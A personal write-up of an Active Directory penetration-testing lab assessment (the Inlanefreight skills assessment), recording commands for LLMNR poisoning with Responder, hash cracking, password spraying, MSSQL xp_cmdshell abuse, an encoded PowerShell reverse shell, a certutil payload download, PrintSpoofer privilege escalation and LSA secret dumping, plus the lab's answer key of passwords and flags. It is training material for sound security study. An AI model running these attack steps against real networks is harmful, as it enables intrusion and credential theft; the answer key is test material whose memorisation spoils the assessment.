AD Enumeration & Attacks - Skills Assessment Part II

The Scenario

Our client Inlanefreight has contracted us again to perform a full-scope internal penetration test. The client is looking to find and remediate as many flaws as possible before going through a merger & acquisition process. The new CISO is particularly worried about more nuanced AD security flaws that may have gone unnoticed during previous penetration tests. The client is not concerned about stealth/evasive tactics and has also provided us with a Parrot Linux VM within the internal network to get the best possible coverage of all angles of the network and the Active Directory environment. Connect to the internal attack host via SSH (you can also connect to it using xfreerdp as shown in the beginning of this module) and begin looking for a foothold into the domain. Once you have a foothold, enumerate the domain and look for flaws that can be utilized to move laterally, escalate privileges, and achieve domain compromise.

Assessment Scope

The following IPs, hosts, and domains defined below make up the scope of the assessment.

In Scope For Assessment

Range/Domain	Description
INLANEFREIGHT.LOCAL	Customer domain to include AD and web services.
LOGISTICS.INLANEFREIGHT.LOCAL	Customer subdomain
FREIGHTLOGISTICS.LOCAL	Subsidiary company owned by Inlanefreight. External forest trust with INLANEFREIGHT.LOCAL
172.16.5.0/23	In-scope internal subnet.

Write Up

We first connect via ssh to our Parrot VM in the internal network, once in we can begin to try to find a foothold for us. We start by running Responder and seeing if we can get any hashes back from a poisoned request.

sudo responder -I ens224 -dwPv

After 5 minutes we are getting hashes back, we can't see them

[] [LLMNR] Poisoned answer sent to 172.16.7.3 for name INLANEFRIGHT [] Skipping previously captured hash for INLANEFREIGHT\AB920

We can fix this by adding -v to our command, we run it again and get back a proper hash this time!

[SMB] NTLMv2-SSP Client : 172.16.7.3 [SMB] NTLMv2-SSP Username : INLANEFREIGHT\AB920 [SMB] NTLMv2-SSP Hash : AB920::INLANEFREIGHT:15293b26b356bd0e:947E4AF7CB448A8028CF5F9E9CCABCE1:010100000000000000EB51F402D1DA01A052E0181FA8A4210000000002000800580031003700470001001E00570049004E002D0058005200380035004C004F005000560051004200530004003400570049004E002D0058005200380035004C004F00500056005100420053002E0058003100370047002E004C004F00430041004C000300140058003100370047002E004C004F00430041004C000500140058003100370047002E004C004F00430041004C000700080000EB51F402D1DA010600040002000000080030003000000000000000000000000020000031ADCA30D4AE85BD42607A44EB6CFC90E7B1AF48C04721BEF85955BC14F262500A0010000000000000000000000000000000000009002E0063006900660073002F0049004E004C0041004E0045004600520049004700480054002E004C004F00430041004C00000000000000000000000000

We now can save the hash locally and pass it to Hashcat to try to crack it

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt.gz

We got a match weasal

Now is also a good time to do a ping sweep to discover any other hosts on the network

here

fping -asgq 172.16.7.0/24

172.16.7.3

172.16.7.50

172.16.7.60

172.16.7.240

We see there are four hosts in total, so we can assume each represents a forest or a Domain controller that we might be able to connect to.

Let's pass this into nmap to get some more information about open ports. OS (outdated, hopefully) etc.

From our scan of 172.16.7.50 we can see this is the domain MS01

I tried a few methods like psexec, wmiexec and crackmap but could not connect with them. Eventually I tried evil-winrm and managed to log in and take the flag.

here

evil-winrm -u AB920 -i 172.16.7.50 -p weasal

Our next step is to make a target user list to find weak password to, I though password spraying would be a good idea to catch any low-hanging fruit and enable further enumeration of the domains.

After trying, I realised I needed to get the list of users on MS01 by logging into it, after some time struggling to get a pivot with ssh dynamic port forwarding

here

ssh -D 9050 htb-student@10.129.238.22 (On our attack machine)

Now I could run xfreerdp with proxychains

here

proxychains xfreerdp /v:172.16.7.50 /u:AB920 /p:weasal /drive:share,/home/htb-ac-795544

I next imported PowerView and Kerbrute to the Windows machine

I then loaded PowerView

here

Import-module .\PowerView.ps1 PS C:\Users\AB920\Desktop> Set-ExecutionPolicy Bypass -Scope Process

And then ran the following to enumerate users in the domain

here

Get-DomainUser * | Select-Object -ExpandProperty samaccountname | Foreach {$_.TrimEnd()} |Set-Content adusers.txt

here

PS C:\Users\AB920\Desktop> Get-Content .\adusers.txt | select -First 10

here

Now we could try to use password spraying to guess any easy passwords

We got a hit with BR086@INLANEFREIGHT.LOCAL:Welcome1

Our next task was to find a config file, I tried Snaffler but couldn't find anything useful

I then realised I was still the old user and needed to create a new PowerShell session with the newly found user

here

here

runas /netonly /user:INLANEFREIGHT\bro86 powershell

.\Snaffler.exe -d INLANEFREIGHT.LOCAL -s data

It still didn't work for me, so I ended up having to look it up...

netdb:D@ta_bAse_adm1n!

Now was time to connect to the DB!

mssqlclient.py -p 1433 netdb:D@ta_bAse_adm1n\!@172.16.7.60

We then enabled the xp_cmdshell so we could execute commands

After trying to dump the file we needed, I realised we needed admin privileges so I decided to see if I could dump hashes from the DB

We started Responder from the ssh instance sudo responder -I ens224

Then on the shell connected to the DB we ran EXEC master..xp_dirtree '\ATTACKING-IP\share', successfully responding with a hash for the user SQL01!

The hash didn't help as there was no RDP instance, and trying to connect with CME and MSSQL didn't work either.

So I pivoted and took a different approach, a reverse shell from the MSSQL instance.

xp_cmdshell powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA3ADIALgAxADYALgA3AC4AMgA0ADAAIgAsADkAMAAwADEAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA
output

And then by starting a listener on the SSH instance to catch the shell

here

nc -lnvp 9001

This worked but I was limited to not been able to see inside the admin dir as I need to elevate my privileges on the system now

I decided to try PrintSpooderso teh first task was uploading it the system, fortunately certutil came in clutch

here

xp_cmdshell certutil.exe -urlcache -split -f "http://172.16.7.240:8080/PrintSpoofer.exe" C:\Temp\PrintSpoofer.exe

With PrintSpoofer on the system we could run the following to change the admin account password

here

xp_cmdshell C:\Windows\Temp\PrintSpoofer.exe -c "net user administrator Welcome1"

Now was time to get the flag after an unsuccessful attempt at RDP again, I tried scanning the SMB shares and found the flag

here

smbclient -U administrator%Welcome1 -L //172.16.7.60

Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
IPC$            IPC       Remote IPC

smbclient -U administrator%Welcome1 \\172.16.7.60/C$

here

...

here

smb: \Users\Administrator\Desktop> get flag.txt

We managed to find our next user and password with

sudo crackmapexec smb 172.16.7.60 -u administrator -p Welcome1 --local-auth --lsa

mssqlsvc:Sup3rS3cur3maY5ql$3rverE

Once in we can grab the flag for the next question

proxychains xfreerdp /v:172.16.7.50 /u:mssqlsvc /p:'Sup3rS3cur3maY5ql$3rverE' /drive:share,/home/htb-ac-795544/

New we need to search for a new user and there creds

I tried to use PowerShell but it seemed like Windows was blocking it, so I ended up running

Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass 
Import-Module .\PowerView.ps1

This bypassed the blocking and PowerView worked!

After trying and failing with PowerView I got Inveigh on the Windows instance and managed to get a hash from a user ct059

CT059::INLANEFREIGHT:53A4051B936325CA:4DC7E324700EC2D9A39F3127D8F9D91E:01010000000000008BAA64431FD2DA01DDB95C2B34FFEBDC0000000002001A0049004E004C0041004E0045004600520045004900470048005400010008004D005300300031000400260049004E004C0041004E00450046005200450049004700480054002E004C004F00430041004C00030030004D005300300031002E0049004E004C0041004E00450046005200450049004700480054002E004C004F00430041004C000500260049004E004C0041004E00450046005200450049004700480054002E004C004F00430041004C00070008008BAA64431FD2DA010600040002000000080030003000000000000000000000000020000052332D3E7E7E8BDE30EE616C175971D90BB4F18A6A11FEC467A961F139D710080A001000000000000000000000000000000000000900200063006900660073002F003100370032002E00310036002E0037002E0035003000000000000000000000000000

Running it through hashcat gaves us a password charlie1

We then connected to this user

proxychains xfreerdp /v:172.16.7.50 /u:ct059 /p:'charlie1' /drive:share,/home/htb-ac-795544/

Once in we uplaoded sharphound and bloodhound to the systemn and then ran SharpHound to collect information

.\SharpHound.exe

and then passed this to BloodHound

.\BloodHound.exe

From this we could gather how next to proceed

Had to use a different version of PowerView

PowerSploit/PowerView.ps1 at master · ZeroDayLab/PowerSploitGitHub

Questions

Obtain a password hash for a domain user account that can be leveraged to gain a foothold in the domain. What is the account name?

AB920

What is this user's cleartext password?

weasal

Submit the contents of the C:\flag.txt file on MS01.

aud1t_gr0up_m3mbersh1ps!

Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain.

BRO86

What is this user's password?

Welcome1

Locate a configuration file containing an MSSQL connection string. What is the password for the user listed in this file?

D@ta_bAse_adm1n!

Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.

here

Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.

here

Obtain credentials for a user who has GenericAll rights over the Domain Admins group. What's this user's account name?

here

Submit Hint+ 1 Crack this user's password hash and submit the cleartext password as your answer.

here

Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host.

here

Submit the NTLM hash for the KRBTGT account for the target domain after achieving domain compromise.